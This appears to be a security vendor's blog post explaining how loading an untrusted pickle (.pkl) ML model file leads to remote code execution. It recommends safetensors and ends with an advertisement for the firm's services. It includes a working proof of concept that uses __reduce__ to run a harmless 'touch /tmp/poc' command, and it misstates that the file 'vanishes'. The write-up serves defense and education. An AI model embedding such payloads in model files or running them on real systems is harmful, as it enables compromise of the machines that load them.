The Simplest Bug is the Deadliest: Remote Code Execution (RCE) via Pickle in Machine Learning

Sometimes the simplest bugs are the most dangerous—especially when they’ve been hiding in plain sight. In the world of Machine Learning (ML), data scientists download and load hundreds of pre-trained models every day. However, a classic habit in the industry—using Python's pickle.load()—opens the door wide to Remote Code Execution (RCE).

The Short Answer: Python’s built-in pickle module, heavily used to serialize and deserialize (.pkl) machine learning models, is inherently unsafe. Deserializing a malicious .pkl file doesn’t just unpack data—it executes code. Loading an untrusted model file is enough for an attacker to run arbitrary operating system commands on your servers. At Eresus Security, we highly recommend abandoning .pkl formats in favor of secure alternatives like safetensors to prevent these types of Model File Vulnerabilities (MFVs) in ML pipelines.

1. The Vulnerability Explained: Pickle Doesn't Just Read, It Acts

The primary purpose of the pickle module is to serialize (dump) an object and deserialize (load) it later. The fatal flaw lies in how pickle.load() operates: when reconstructing an object, it triggers the magical __reduce__() method.

If a malicious actor overrides this method to return arbitrary system commands, Python simply executes them without validation. You don't need to bypass parsers or deal with memory corruption—just passing the file to the load() function is the trigger. It is stupidly simple, yet devastating.

2. Proof of Concept (PoC)

Exploiting this flaw doesn’t require reverse engineering. Here is a step-by-step demonstration of how a malicious model file is crafted:

Step 1: Craft the Payload

The attacker creates a Python class that hijacks the __reduce__() method:

import pickle
import os

class Malicious:
    def __reduce__(self):
        # This instructs the system to execute the internal bash command!
        return (os.system, ("touch /tmp/poc",))

Step 2: Serialize the Payload

The attacker packages this malicious object as a standard model file (.pkl) and uploads it to the web:

# Serialize the malicious object
payload = pickle.dumps(Malicious())

# Save it to a file
with open("malicious.pkl", "wb") as f:
    f.write(payload)

Step 3: Simulate the Victim

An innocent data scientist or backend machine learning microservice simply tries to load the model:

import pickle

with open("malicious.pkl", "rb") as f:
    pickle.load(f) # <- The point of no return

At this point, /tmp/poc vanishes out of thin air on the victim's server—absolute proof of arbitrary code execution.

3. Why This Matters for Model File Vulnerabilities (MFVs)

This vulnerability is a textbook MFV. It isn't explicitly a bug in TensorFlow or PyTorch; it's a fundamental part of core Python.

Framework Agnostic: If a project relies on Pickle or HDF5-based files to save or load models, it's vulnerable across the board.
Easy Hunting Ground: Platforms like Kaggle, Hugging Face, or GitHub host millions of .pkl files. It only takes one poisoned model integrated into a corporate environment to create a full system compromise. If your application has a simple "Upload .pkl model" feature without robust checks, bug bounty hunters (and malicious hackers) will figure it out immediately.
Defending is Simple: Because of this very vulnerability, the modern MLOps standard is heavily shifting towards formats like safetensors, which strictly store mathematical weight matrices and run zero code.

4. Secure Your ML Pipelines with Eresus Security

Are the models powering your application silently harboring RCE potential?

Protecting a modern application isn’t just about putting a WAF in front of web forms—it’s about deeply analyzing how your AI and Data pipelines ingest files. Eresus Security goes beyond conventional penetration testing. We audit your MLOps pipelines end-to-end to ensure that simple deserialization flaws—and sophisticated Agentic AI security loop vulnerabilities—are eliminated before they hit production.